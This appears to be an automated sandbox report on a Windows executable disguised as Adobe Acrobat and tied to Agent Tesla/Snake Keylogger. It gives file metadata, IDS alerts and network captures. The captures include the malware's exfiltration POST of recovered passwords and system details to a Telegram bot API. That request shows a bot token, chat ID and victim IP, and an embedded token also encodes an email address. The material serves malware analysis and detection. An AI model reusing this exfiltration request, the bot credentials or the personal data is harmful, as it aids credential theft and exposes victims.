                                                                              DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              3c638k0NJx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              drRbNknjyb.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              3GrfjMY0pG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              TELEGRAMRUcqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              NDCNDvC27F.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              3c638k0NJx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 149.154.167.99
                                                                              drRbNknjyb.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              CLOUDFLARENETUSjki-dragon-release-online-setup.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.17.118.104
                                                                              1258ad6Jpw.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 104.21.16.1
                                                                              kbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.26.12.205
                                                                              NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.74.152
                                                                              iFoDComHqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                              • 104.21.112.1
                                                                              yXsTZ347KJ.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.130.233
                                                                              https://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWAGet hashmaliciousUnknownBrowse
                                                                              • 172.65.198.159
                                                                              cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.16.1
                                                                              g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 104.21.64.1

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0ekbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              yXsTZ347KJ.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              yXsTZ347KJ.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              bvhauD4o49.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              0CBJ3aLKx0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205
                                                                              Jynj1RQC49.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              • 104.26.13.205

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              No created / dropped files found

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.258567653551615
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:xnlP06YunJ.exe
                                                                              File size:1'971'616 bytes
                                                                              MD5:a76f2b7c0390e364909268037328a880
                                                                              SHA1:2177eb596046f6f3a0fd743cad0a438c990fdde4
                                                                              SHA256:3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040
                                                                              SHA512:27ee519113d2f4802f24e052ea417ea1c1b78ed301aaa1326666626d5d7ec6099ea3f378ce384783133eb5cd67fceef8a35bbf37112bbbbb8a961598017e82f6
                                                                              SSDEEP:24576:SUmGUfci/Tao+BWXxKhBpIildTdqsHs2TpwB2XPMPYMG8FoSpm7He58ynvdq2DI2:obKCEdqsdmg8Y6oS6Wpv4z
                                                                              TLSH:3195CE023686CF60D19F1776C4A644F41363FE41ED4ED7EB298A7FEA387236669401A3
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................:...........Y... ...`....@.. .......................@............`................................

                                                                              File Icon

                                                                              Icon Hash:2d525272484c550b

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x58590e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x67ABC0FB [Tue Feb 11 21:28:27 2025 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Authenticode Signature

                                                                              Signature Valid:false
                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                              Error Number:-2146869232
                                                                              Not Before, Not After
                                                                              • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                                              Subject Chain
                                                                              • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                              Version:3
                                                                              Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                              Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                              Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                              Serial:0D1A340F78D7D000E089FDBAAD6522DF

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1858c00x4b.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1860000x5adc0.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1dec000x29a0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e20000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x1839140x183a0088849082b3e68b4fd3803845b13b4c0eFalse0.8840350139068043SysEx File -7.806883109554231IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x1860000x5adc00x5ae00752d1590fcaf03653716eabaabef6b72False0.03483117692572214data2.404004697205331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1e20000xc0x200cee508dd897c8e100543fa9608261735False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x1862200x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 11811 x 11811 px/m0.022916235168801966
                                                                              RT_ICON0x1c82480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/m0.04400804448124926
                                                                              RT_ICON0x1d8a700x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m0.07853094000944733
                                                                              RT_ICON0x1dcc980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m0.10020746887966805
                                                                              RT_ICON0x1df2400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m0.14329268292682926
                                                                              RT_ICON0x1e02e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m0.20035460992907803
                                                                              RT_GROUP_ICON0x1e07500x5adata0.7666666666666667
                                                                              RT_VERSION0x1e07ac0x426data0.4105461393596987
                                                                              RT_MANIFEST0x1e0bd40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Version Infos

                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              CommentsAdobe Acrobat
                                                                              CompanyNameAdobe Systems Incorporated
                                                                              FileDescriptionAdobe Acrobat
                                                                              FileVersion24.5.20320.0
                                                                              InternalNameKqjoqlc.exe
                                                                              LegalCopyrightCopyright 1984-2024 Adobe Systems Incorporated and its licensors. All rights reserved.
                                                                              LegalTrademarks
                                                                              OriginalFilenameKqjoqlc.exe
                                                                              ProductNameAdobe Acrobat
                                                                              ProductVersion24.5.20320.0
                                                                              Assembly Version24.5.20320.0

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-03-07T22:51:09.625936+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749683149.154.167.220443TCP
                                                                              2025-03-07T22:51:10.368588+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.749683149.154.167.220443TCP
                                                                              2025-03-07T22:51:10.368588+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.749683149.154.167.220443TCP
                                                                              2025-03-07T22:51:11.108511+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.749683TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 7, 2025 22:51:02.152507067 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:02.152561903 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:02.152645111 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:02.179785967 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:02.179841042 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:04.189089060 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:04.189168930 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:04.197195053 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:04.197232962 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:04.197573900 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:04.250360012 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:04.311014891 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:04.352375984 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:05.071261883 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:05.117237091 CET44349682104.26.13.205192.168.2.7
                                                                              Mar 7, 2025 22:51:05.120470047 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:05.130430937 CET49682443192.168.2.7104.26.13.205
                                                                              Mar 7, 2025 22:51:06.623522043 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:06.623560905 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:06.623636007 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:06.625297070 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:06.625314951 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:09.253770113 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:09.253849983 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:09.266530991 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:09.266552925 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:09.267010927 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:09.268867016 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:09.316337109 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:09.625754118 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:09.625785112 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:10.368644953 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:10.422244072 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:11.107702017 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:11.108232975 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:51:11.108283997 CET44349683149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:51:11.108340025 CET49683443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:52:40.085621119 CET49691443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:52:40.085676908 CET44349691149.154.167.220192.168.2.7
                                                                              Mar 7, 2025 22:52:40.085920095 CET49691443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:52:40.086226940 CET49691443192.168.2.7149.154.167.220
                                                                              Mar 7, 2025 22:52:40.086246014 CET44349691149.154.167.220192.168.2.7

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 7, 2025 22:51:02.138669968 CET5584953192.168.2.71.1.1.1
                                                                              Mar 7, 2025 22:51:02.145934105 CET53558491.1.1.1192.168.2.7
                                                                              Mar 7, 2025 22:51:06.615628004 CET5583453192.168.2.71.1.1.1
                                                                              Mar 7, 2025 22:51:06.622925043 CET53558341.1.1.1192.168.2.7

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Mar 7, 2025 22:51:02.138669968 CET192.168.2.71.1.1.10xfdf2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                              Mar 7, 2025 22:51:06.615628004 CET192.168.2.71.1.1.10x3594Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Mar 7, 2025 22:51:02.145934105 CET1.1.1.1192.168.2.70xfdf2No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                              Mar 7, 2025 22:51:02.145934105 CET1.1.1.1192.168.2.70xfdf2No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                              Mar 7, 2025 22:51:02.145934105 CET1.1.1.1192.168.2.70xfdf2No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                              Mar 7, 2025 22:51:06.622925043 CET1.1.1.1192.168.2.70x3594No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • api.ipify.org
                                                                              • api.telegram.org

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749682104.26.13.205443524C:\Users\user\Desktop\xnlP06YunJ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-03-07 21:51:04 UTC155OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                              Host: api.ipify.org
                                                                              Connection: Keep-Alive
                                                                              2025-03-07 21:51:05 UTC426INHTTP/1.1 200 OK
                                                                              Date: Fri, 07 Mar 2025 21:51:04 GMT
                                                                              Content-Type: text/plain
                                                                              Content-Length: 12
                                                                              Connection: close
                                                                              Vary: Origin
                                                                              cf-cache-status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 91cd4fe53a9382e7-IAD
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=73040&min_rtt=52449&rtt_var=33195&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=55080&cwnd=175&unsent_bytes=0&cid=5eebf2ee87cd5bb7&ts=736&x=0"
                                                                              2025-03-07 21:51:05 UTC12INData Raw: 37 31 2e 32 32 30 2e 31 35 2e 36 30
                                                                              Data Ascii: 71.220.15.60


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749683149.154.167.220443524C:\Users\user\Desktop\xnlP06YunJ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-03-07 21:51:09 UTC260OUTPOST /bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=---------------------------8dd5d984054af83
                                                                              Host: api.telegram.org
                                                                              Content-Length: 980
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              2025-03-07 21:51:09 UTC980OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 64 39 38 34 30 35 34 61 66 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 33 30 39 34 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 64 39 38 34 30 35 34 61 66 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 37 2f 32 30 32 35 20 31 36 3a 35 31 3a 30 35 0a 55 73 65 72
                                                                              Data Ascii: -----------------------------8dd5d984054af83Content-Disposition: form-data; name="chat_id"7103094488-----------------------------8dd5d984054af83Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/07/2025 16:51:05User
                                                                              2025-03-07 21:51:10 UTC25INHTTP/1.1 100 Continue
                                                                              2025-03-07 21:51:11 UTC1207INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Fri, 07 Mar 2025 21:51:10 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 819
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              {"ok":true,"result":{"message_id":9833,"from":{"id":7351654760,"is_bot":true,"first_name":"\u0422\u043e\u0442 \u0441\u0430\u043c\u044b\u0439 \u0431\u043e\u0442","username":"KolabinBot"},"chat":{"id":7103094488,"first_name":"Garett","last_name":"Taller","username":"garetttaller","type":"private"},"date":1741384270,"document":{"file_name":"user-609290 2025-03-07 16-51-05.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAImaWfLak6z4DnlSOvi1g5l77xfMyhzAAIYBQACBEFhRvqpk1mkptksNgQ","file_unique_id":"AgADGAUAAgRBYUY","file_size":351},"caption":"New PW Recovered!\n\nTime: 03/07/2025 16:51:05\nUser Name: user/609290\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 71.220.15.60","caption_entities":[{"offset":182,"length":12,"type":"url"}]}}


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:16:50:32
                                                                              Start date:07/03/2025
                                                                              Path:C:\Users\user\Desktop\xnlP06YunJ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\xnlP06YunJ.exe"
                                                                              Imagebase:0xdd0000
                                                                              File size:1'971'616 bytes
                                                                              MD5 hash:A76F2B7C0390E364909268037328A880
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1158237609.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:16:50:33
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                              Imagebase:0x460000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:16:50:33
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff642da0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
